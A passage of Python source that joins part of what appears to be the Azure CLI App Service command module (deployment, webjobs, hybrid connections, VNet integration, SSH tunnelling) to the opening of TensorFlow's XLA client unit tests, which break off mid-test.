ApplicationInsightsManagementClient) ai_properties = { "name": ai_name, "location": ai_location, "kind": "web", "properties": { "Application_Type": "web" } } appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties) if appinsights is None or appinsights.instrumentation_key is None: logger.warning(creation_failed_warn) return # We make this success message as a warning to no interfere with regular JSON output in stdout logger.warning('Application Insights \"%s\" was created for this Function App. ' 'You can visit https://portal.azure.com/#resource%s/overview to view your ' 'Application Insights component', appinsights.name, appinsights.id) update_app_settings(cmd, functionapp.resource_group, functionapp.name, ['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)]) def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None, deployment_source_branch='master', deployment_local_git=None): if deployment_source_url: logger.warning("Linking to git repository '%s'", deployment_source_url) try: config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git', deployment_source_branch, manual_integration=True) except Exception as ex: # pylint: disable=broad-except ex = ex_handler_factory(no_throw=True)(ex) logger.warning("Link to git repository failed due to error '%s'", ex) if deployment_local_git: local_git_info = enable_local_git(cmd, resource_group_name, name) logger.warning("Local git is configured with url of '%s'", local_git_info['url']) setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url']) def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account): sa_resource_group = resource_group_name if is_valid_resource_id(storage_account): sa_resource_group = parse_resource_id(storage_account)['resource_group'] storage_account = parse_resource_id(storage_account)['name'] storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient) storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group, storage_account) error_message = '' endpoints = storage_properties.primary_endpoints sku = storage_properties.sku.name allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS'] for e in ['blob', 'queue', 'table']: if not getattr(endpoints, e, None): error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long if sku not in allowed_storage_types: error_message += 'Storage type {} is not allowed'.format(sku) if error_message: raise CLIError(error_message) obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member try: keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member except AttributeError: # Older API versions have a slightly different structure keys = [obj.key1, obj.key2] # pylint: disable=no-member endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format( "https", endpoint_suffix, storage_account, keys[0]) # pylint: disable=no-member return connection_string def list_consumption_locations(cmd): client = web_client_factory(cmd.cli_ctx) regions = client.list_geo_regions(sku='Dynamic') return [{'name': x.name.lower().replace(' ', '')} for x in regions] def list_locations(cmd, sku, linux_workers_enabled=None): client = web_client_factory(cmd.cli_ctx) full_sku = get_sku_name(sku) return client.list_geo_regions(full_sku, linux_workers_enabled) def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None): import requests from azure.cli.core.util import should_disable_connection_verify total_trials = (int(timeout) // 2) if timeout else 450 num_trials = 0 while num_trials < total_trials: time.sleep(2) response = requests.get(deployment_status_url, headers=authorization, verify=not should_disable_connection_verify()) time.sleep(2) try: res_dict = response.json() except json.decoder.JSONDecodeError: logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url) res_dict = {} finally: num_trials = num_trials + 1 if res_dict.get('status', 0) == 3: _configure_default_logging(cmd, rg_name, name) raise CLIError("""Zip deployment failed. {}. Please run the command az webapp log tail -n {} -g {}""".format(res_dict, name, rg_name)) if res_dict.get('status', 0) == 4: break if 'progress' in res_dict: logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing # if the deployment is taking longer than expected if res_dict.get('status', 0) != 4: _configure_default_logging(cmd, rg_name, name) raise CLIError("""Timeout reached by the command, however, the deployment operation is still on-going. Navigate to your scm site to check the deployment status""") return res_dict def list_continuous_webjobs(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot) def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name) return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name) def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name) return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name) def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name) def list_triggered_webjobs(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot) def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot) client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name) return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name) def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name) def list_hc(cmd, name, resource_group_name, slot=None): linux_webapp = show_webapp(cmd, resource_group_name, name, slot) is_linux = linux_webapp.reserved if is_linux: return logger.warning("hybrid connections not supported on a linux app.") client = web_client_factory(cmd.cli_ctx) if slot is None: listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name) else: listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot) # reformats hybrid connection, to prune unnecessary fields mod_list = [] for x in listed_vals.additional_properties["value"]: properties = x["properties"] resourceGroup = x["id"].split("/") mod_hc = { "id": x["id"], "location": x["location"], "name": x["name"], "properties": { "hostname": properties["hostname"], "port": properties["port"], "relayArmUri": properties["relayArmUri"], "relayName": properties["relayName"], "serviceBusNamespace": properties["serviceBusNamespace"], "serviceBusSuffix": properties["serviceBusSuffix"] }, "resourceGroup": resourceGroup[4], "type": x["type"] } mod_list.append(mod_hc) return mod_list def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None): HybridConnection = cmd.get_models('HybridConnection') linux_webapp = show_webapp(cmd, resource_group_name, name, slot) is_linux = linux_webapp.reserved if is_linux: return logger.warning("hybrid connections not supported on a linux app.") web_client = web_client_factory(cmd.cli_ctx) hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx) namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx) hy_co_id = '' for n in namespace_client.list(): if n.name == namespace: hy_co_id = n.id i = 0 hy_co_resource_group = '' hy_co_split = hy_co_id.split("/") for z in hy_co_split: if z == "resourceGroups": hy_co_resource_group = hy_co_split[i + 1] i = i + 1 # calling the relay API to get information about the hybrid connection hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection) # if the hybrid connection does not have a default sender authorization # rule, create it hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection) has_default_sender_key = False for r in hy_co_rules: if r.name.lower() == "defaultsender": for z in r.rights: if z == z.send: has_default_sender_key = True if not has_default_sender_key: rights = [AccessRights.send] hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection, "defaultSender", rights) hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender") hy_co_info = hy_co.id hy_co_metadata = ast.literal_eval(hy_co.user_metadata) hy_co_hostname = '' for x in hy_co_metadata: if x["key"] == "endpoint": hy_co_hostname = x["value"] hostname_parts = hy_co_hostname.split(":") hostname = hostname_parts[0] port = hostname_parts[1] id_parameters = hy_co_info.split("/") # populate object with information from the hybrid connection, and set it # on webapp hc = HybridConnection(service_bus_namespace=id_parameters[8], relay_name=hybrid_connection, relay_arm_uri=hy_co_info, hostname=hostname, port=port, send_key_name="defaultSender", send_key_value=hy_co_keys.primary_key, service_bus_suffix=".servicebus.windows.net") if slot is None: return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace, hybrid_connection, hc) else: return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace, hybrid_connection, hc, slot) # reformats hybrid connection, to prune unnecessary fields resourceGroup = return_hc.id.split("/") mod_hc = { "hostname": return_hc.hostname, "id": return_hc.id, "location": return_hc.additional_properties["location"], "name": return_hc.name, "port": return_hc.port, "relayArmUri": return_hc.relay_arm_uri, "resourceGroup": resourceGroup[4], "serviceBusNamespace": return_hc.service_bus_namespace, "serviceBusSuffix": return_hc.service_bus_suffix } return mod_hc # set the key the apps use to connect with the hybrid connection def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type): HybridConnection = cmd.get_models('HybridConnection') web_client = web_client_factory(cmd.cli_ctx) # extract the hybrid connection resource group asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan, namespace, hybrid_connection) arm_uri = asp_hy_co.relay_arm_uri split_uri = arm_uri.split("resourceGroups/") resource_group_strings = split_uri[1].split('/') relay_resource_group = resource_group_strings[0] hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx) # calling the relay function to obtain information about the hc in question hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection) # if the hybrid connection does not have a default sender authorization # rule, create it hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection) has_default_sender_key = False for r in hy_co_rules: if r.name.lower() == "defaultsender": for z in r.rights: if z == z.send: has_default_sender_key = True if not has_default_sender_key: rights = [AccessRights.send] hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection, "defaultSender", rights) hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender") hy_co_metadata = ast.literal_eval(hy_co.user_metadata) hy_co_hostname = 0 for x in hy_co_metadata: if x["key"] == "endpoint": hy_co_hostname = x["value"] hostname_parts = hy_co_hostname.split(":") hostname = hostname_parts[0] port = hostname_parts[1] key = "empty" if key_type.lower() == "primary": key = hy_co_keys.primary_key elif key_type.lower() == "secondary": key = hy_co_keys.secondary_key # enures input is correct if key == "empty": logger.warning("Key type is invalid - must be primary or secondary") return apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace, hybrid_connection) # changes the key for every app that uses that hybrid connection for x in apps: app_info = ast.literal_eval(x) app_name = app_info["name"] app_id = app_info["id"] id_split = app_id.split("/") app_resource_group = id_split[4] hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection, relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender", send_key_value=key) web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace, hybrid_connection, hc) return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace, hybrid_connection) def appservice_list_vnet(cmd, resource_group_name, plan): web_client = web_client_factory(cmd.cli_ctx) return web_client.app_service_plans.list_vnets(resource_group_name, plan) def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None): linux_webapp = show_webapp(cmd, resource_group_name, name, slot) is_linux = linux_webapp.reserved if is_linux: return logger.warning("hybrid connections not supported on a linux app.") client = web_client_factory(cmd.cli_ctx) if slot is None: return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection) else: return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace, hybrid_connection, slot) return return_hc def list_vnet_integration(cmd, name, resource_group_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot is None: result = list(client.web_apps.list_vnet_connections(resource_group_name, name)) else: result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot)) mod_list = [] # reformats the vnet entry, removing unecessary information for x in result: # removes GUIDs from name and id longName = x.name if '_' in longName: usIndex = longName.index('_') shortName = longName[usIndex + 1:] else: shortName = longName v_id = x.id lastSlash = v_id.rindex('/') shortId = v_id[:lastSlash] + '/' + shortName # extracts desired fields certThumbprint = x.cert_thumbprint location = x.additional_properties["location"] v_type = x.type vnet_resource_id = x.vnet_resource_id id_strings = v_id.split('/') resourceGroup = id_strings[4] routes = x.routes vnet_mod = {"certThumbprint": certThumbprint, "id": shortId, "location": location, "name": shortName, "resourceGroup": resourceGroup, "routes": routes, "type": v_type, "vnetResourceId": vnet_resource_id} mod_list.append(vnet_mod) return mod_list def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None): SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork') Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK) client = web_client_factory(cmd.cli_ctx) vnet_client = network_client_factory(cmd.cli_ctx) list_all_vnets = vnet_client.virtual_networks.list_all() vnet_id = '' for v in list_all_vnets: if v.name == vnet: vnet_id = v.id # parsing the arm uri in order to extract vnet_name and vnet_resource_group vnet_id_strings = vnet_id.split('/') vnet_resource_group = '' i = 0 for z in vnet_id_strings: if z.lower() == "resourcegroups": vnet_resource_group = vnet_id_strings[i + 1] i = i + 1 if slot is None: swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name) else: swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name, name, slot) # check to see if the connection would be supported if swift_connection_info.swift_supported is not True: return logger.warning("""Your app must be in an Azure App Service deployment that is capable of scaling up to Premium v2\nLearn more: https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""") subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet) delegations = subnetObj.delegations delegated = False for d in delegations: if d.service_name.lower() == "microsoft.web/serverfarms".lower(): delegated = True if not delegated: subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")] vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet, subnet_parameters=subnetObj) id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet) subnet_resource_id = id_subnet.id swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id, swift_supported=True) if slot is None: return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name, swiftVnet) else: return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name, swiftVnet, slot) # reformats the vnet entry, removing unecessary information id_strings = return_vnet.id.split('/') resourceGroup = id_strings[4] mod_vnet = { "id": return_vnet.id, "location": return_vnet.additional_properties["location"], "name": return_vnet.name, "resourceGroup": resourceGroup, "subnetResourceId": return_vnet.subnet_resource_id } return mod_vnet def remove_vnet_integration(cmd, name, resource_group_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot is None: return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name) else: return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot) return return_vnet def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name) def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, dryrun=False, logs=False, # pylint: disable=too-many-statements, launch_browser=False, html=False): import os AppServicePlan = cmd.get_models('AppServicePlan') src_dir = os.getcwd() _src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep)) client = web_client_factory(cmd.cli_ctx) user = get_profile_username() _create_new_rg = False _create_new_app = does_app_already_exist(cmd, name) os_name = detect_os_form_src(src_dir, html) lang_details = get_lang_from_content(src_dir, html) language = lang_details.get('language') # detect the version data = get_runtime_version_details(lang_details.get('file_loc'), language) version_used_create = data.get('to_create') detected_version = data.get('detected') runtime_version = "{}|{}".format(language, version_used_create) if \ version_used_create != "-" else version_used_create site_config = None if not _create_new_app: # App exists # Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those logger.warning("Webapp %s already exists. The command will deploy contents to the existing app.", name) app_details = get_app_details(cmd, name) if app_details is None: raise CLIError("Unable to retrieve details of the existing app {}. Please check that the app is a part of " "the current subscription".format(name)) current_rg = app_details.resource_group if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()): raise CLIError("The webapp {} exists in ResourceGroup {} and does not match the value entered {}. Please " "re-run command with the correct parameters.". format(name, current_rg, resource_group_name)) rg_name = resource_group_name or current_rg if location is None: loc = app_details.location.replace(" ", "").lower() else: loc = location.replace(" ", "").lower() plan_details = parse_resource_id(app_details.server_farm_id) current_plan = plan_details['name'] if plan is not None and current_plan.lower() != plan.lower(): raise CLIError("The plan name entered {} does not match the plan name that the webapp is hosted in {}." "Please check if you have configured defaults for plan name and re-run command." .format(plan, current_plan)) plan = plan or plan_details['name'] plan_info = client.app_service_plans.get(rg_name, plan) sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free' current_os = 'Linux' if plan_info.reserved else 'Windows' # Raise error if current OS of the app is different from the current one if current_os.lower() != os_name.lower(): raise CLIError("The webapp {} is a {} app. The code detected at '{}' will default to " "'{}'. " "Please create a new app to continue this operation.".format(name, current_os, src_dir, os)) _is_linux = plan_info.reserved # for an existing app check if the runtime version needs to be updated # Get site config to check the runtime version site_config = client.web_apps.get_configuration(rg_name, name) else: # need to create new app, check if we need to use default RG or use user entered values logger.warning("webapp %s doesn't exist", name) sku = get_sku_to_use(src_dir, html, sku) loc = set_location(cmd, sku, location) rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name) _is_linux = os_name.lower() == 'linux' _create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux) plan = get_plan_to_use(cmd, user, os_name, loc, sku, rg_name, _create_new_rg, plan) dry_run_str = r""" { "name" : "%s", "appserviceplan" : "%s", "resourcegroup" : "%s", "sku": "%s", "os": "%s", "location" : "%s", "src_path" : "%s", "runtime_version_detected": "%s", "runtime_version": "%s" } """ % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version, runtime_version) create_json = json.loads(dry_run_str) if dryrun: logger.warning("Web app will be created with the below configuration,re-run command " "without the --dryrun flag to create & deploy a new app") return create_json if _create_new_rg: logger.warning("Creating Resource group '%s' ...", rg_name) create_resource_group(cmd, rg_name, location) logger.warning("Resource group creation complete") # create ASP logger.warning("Creating AppServicePlan '%s' ...", plan) # we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are # updated we update those create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku, number_of_workers=1 if _is_linux else None, location=location) if _create_new_app: logger.warning("Creating webapp '%s' ...", name) create_webapp(cmd, rg_name, name, plan, runtime_version if _is_linux else None, tags={"cli": 'webapp_up'}, using_webapp_up=True, language=language) _configure_default_logging(cmd, rg_name, name) else: # for existing app if we might need to update the stack runtime settings if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version: logger.warning('Updating runtime version from %s to %s', site_config.linux_fx_version, runtime_version) update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version) elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version: logger.warning('Updating runtime version from %s to %s', site_config.windows_fx_version, runtime_version) update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version) create_json['runtime_version'] = runtime_version # Zip contents & Deploy logger.warning("Creating zip with contents of dir %s ...", src_dir) # zip contents & deploy zip_file_path = zip_contents_from_dir(src_dir, language) enable_zip_deploy(cmd, rg_name, name, zip_file_path) # Remove the file after deployment, handling exception if user removed the file manually try: os.remove(zip_file_path) except OSError: pass if launch_browser: logger.warning("Launching app using default browser") view_in_browser(cmd, rg_name, name, None, logs) else: _url = _get_url(cmd, rg_name, name) logger.warning("You can launch the app at %s", _url) create_json.update({'URL': _url}) if logs: _configure_default_logging(cmd, rg_name, name) return get_streaming_log(cmd, rg_name, name) with ConfiguredDefaultSetter(cmd.cli_ctx.config, True): cmd.cli_ctx.config.set_value('defaults', 'group', rg_name) cmd.cli_ctx.config.set_value('defaults', 'sku', sku) cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan) cmd.cli_ctx.config.set_value('defaults', 'location', loc) cmd.cli_ctx.config.set_value('defaults', 'web', name) return create_json def _ping_scm_site(cmd, resource_group, name): from azure.cli.core.util import should_disable_connection_verify # wake up kudu, by making an SCM call import requests # work around until the timeout limits issue for linux is investigated & fixed user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name) scm_url = _get_scm_url(cmd, resource_group, name) import urllib3 authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password)) requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify()) def is_webapp_up(tunnel_server): return tunnel_server.is_webapp_up() def get_tunnel(cmd, resource_group_name, name, port=None, slot=None): webapp = show_webapp(cmd, resource_group_name, name, slot) is_linux = webapp.reserved if not is_linux: raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan") profiles = list_publish_profiles(cmd, resource_group_name, name, slot) profile_user_name = next(p['userName'] for p in profiles) profile_user_password = next(p['userPWD'] for p in profiles) if port is None: port = 0 # Will auto-select a free port from 1024-65535 logger.info('No port defined, creating on random free port') scm_url = _get_scm_url(cmd, resource_group_name, name, slot) tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password) _ping_scm_site(cmd, resource_group_name, name) _wait_for_webapp(tunnel_server) return tunnel_server def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None): tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot) t = threading.Thread(target=_start_tunnel, args=(tunnel_server,)) t.daemon = True t.start() logger.warning('Opening tunnel on port: %s', tunnel_server.local_port) config = get_site_configs(cmd, resource_group_name, name, slot) if config.remote_debugging_enabled: logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port) else: ssh_user_name = 'root' ssh_user_password = 'Docker!' logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password) logger.warning('Ctrl + C to close') if timeout: time.sleep(int(timeout)) else: while t.isAlive(): time.sleep(5) def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None): tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot) t = threading.Thread(target=_start_tunnel, args=(tunnel_server,)) t.daemon = True t.start() ssh_user_name = 'root' ssh_user_password = 'Docker!' s = threading.Thread(target=_start_ssh_session, args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password)) s.daemon = True s.start() if timeout: time.sleep(int(timeout)) else: while s.isAlive() and t.isAlive(): time.sleep(5) def _wait_for_webapp(tunnel_server): tries = 0 while True: if is_webapp_up(tunnel_server): break if tries == 0: logger.warning('Connection is not ready yet, please wait') if tries == 60: raise CLIError("Timeout Error, Unable to establish a connection") tries = tries + 1 logger.warning('.') time.sleep(1) def _start_tunnel(tunnel_server): tunnel_server.start_server() def _start_ssh_session(hostname, port, username, password): tries = 0 while True: try: c = Connection(host=hostname, port=port, user=username, # connect_timeout=60*10, connect_kwargs={"password": password}) break except Exception as ex: # pylint: disable=broad-except logger.info(ex) if tries == 0: logger.warning('Connection is not ready yet, please wait') if tries == 60: raise CLIError("Timeout Error, Unable to establish a connection") tries = tries + 1 logger.warning('.') time.sleep(1) try: c.run('cat /etc/motd', pty=True) c.run('source /etc/profile; exec $SHELL -l', pty=True) except Exception as ex: # pylint: disable=broad-except logger.info(ex) finally: c.close() def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None): # pylint: disable=too-many-statements import platform if platform.system() == "Windows": raise CLIError('webapp ssh is only supported on linux and mac') config = get_site_configs(cmd, resource_group_name, name, slot) if config.remote_debugging_enabled: raise CLIError('remote debugging is enabled, please disable') create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout) def create_devops_pipeline( cmd, functionapp_name=None, organization_name=None, project_name=None, repository_name=None, overwrite_yaml=None, allow_force_push=None, github_pat=None, github_repository=None ): from .azure_devops_build_interactive import AzureDevopsBuildInteractive azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name, organization_name, project_name, repository_name, overwrite_yaml, allow_force_push, github_pat, github_repository) return azure_devops_build_interactive.interactive_azure_devops_build() def _configure_default_logging(cmd, rg_name, name): logger.warning("Configuring default logging for the app, if not already enabled") return config_diagnostics(cmd, rg_name, name, application_logging=True, web_server_logging='filesystem', docker_container_logging='true') def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name): ase_is_id = is_valid_resource_id(ase) if ase_is_id: return ase from msrestazure.tools import resource_id from azure.cli.core.commands.client_factory import get_subscription_id return resource_id( subscription=get_subscription_id(cli_ctx), resource_group=resource_group_name, namespace='Microsoft.Web', type='hostingEnvironments', name=ase) def _validate_asp_sku(app_service_environment, sku): # Isolated SKU is supported only for ASE if sku in ['I1', 'I2', 'I3']: if not app_service_environment: raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to " "learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans") else: if app_service_environment: raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to " "learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans") def _format_key_vault_id(cli_ctx, key_vault, resource_group_name): key_vault_is_id = is_valid_resource_id(key_vault) if key_vault_is_id: return key_vault from msrestazure.tools import resource_id from azure.cli.core.commands.client_factory import get_subscription_id return resource_id( subscription=get_subscription_id(cli_ctx), resource_group=resource_group_name, namespace='Microsoft.KeyVault', type='vaults', name=key_vault) def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None): hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_host_name_bindings', slot) verified_hostname_found = False for hostname_binding in hostname_bindings: binding_name = hostname_binding.name.split('/')[-1] if binding_name.lower() == hostname and hostname_binding.host_name_type == 'Verified': verified_hostname_found = True return verified_hostname_found
xla_client_test.py
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for the Python extension-based XLA client.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import itertools import threading import numpy as np from tensorflow.compiler.xla.python import xla_client import unittest class LocalComputationTest(unittest.TestCase): """Base class for running an XLA Computation through the local client.""" def _NewComputation(self, name=None): if name is None: name = self.id() return xla_client.ComputationBuilder(name) def _Execute(self, c, arguments): compiled_c = c.Build().CompileWithExampleArguments(arguments) return compiled_c.Execute(arguments) def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected): assert expected is not None result = self._Execute(c, arguments) # Numpy's comparison methods are a bit too lenient by treating inputs as # "array-like", meaning that scalar 4 will be happily compared equal to # [[4]]. We'd like to be more strict so assert shapes as well. self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape) assert_func(result, expected) def _ExecuteAndCompareExact(self, c, arguments=(), expected=None): self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected) def _ExecuteAndCompareClose(self, c, arguments=(), expected=None): self._ExecuteAndAssertWith(np.testing.assert_allclose, c, arguments, expected) def NumpyArrayF32(*args, **kwargs): """Convenience wrapper to create Numpy arrays with a np.float32 dtype.""" return np.array(*args, dtype=np.float32, **kwargs) def NumpyArrayF64(*args, **kwargs): """Convenience wrapper to create Numpy arrays with a np.float64 dtype.""" return np.array(*args, dtype=np.float64, **kwargs) def NumpyArrayS32(*args, **kwargs): """Convenience wrapper to create Numpy arrays with a np.int32 dtype.""" return np.array(*args, dtype=np.int32, **kwargs) def NumpyArrayS64(*args, **kwargs): """Convenience wrapper to create Numpy arrays with a np.int64 dtype.""" return np.array(*args, dtype=np.int64, **kwargs) def NumpyArrayBool(*args, **kwargs): """Convenience wrapper to create Numpy arrays with a np.bool dtype.""" return np.array(*args, dtype=np.bool, **kwargs) class ComputationsWithConstantsTest(LocalComputationTest): """Tests focusing on Constant ops.""" def testConstantScalarSumF32(self): c = self._NewComputation() c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14)) self._ExecuteAndCompareClose(c, expected=4.25) def testConstantScalarSumF64(self): c = self._NewComputation() c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14)) self._ExecuteAndCompareClose(c, expected=4.25) def testConstantScalarSumS32(self): c = self._NewComputation() c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2)) self._ExecuteAndCompareClose(c, expected=3) def testConstantScalarSumS64(self): c = self._NewComputation() c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2)) self._ExecuteAndCompareClose(c, expected=3) def testConstantVectorMulF32(self): c = self._NewComputation() 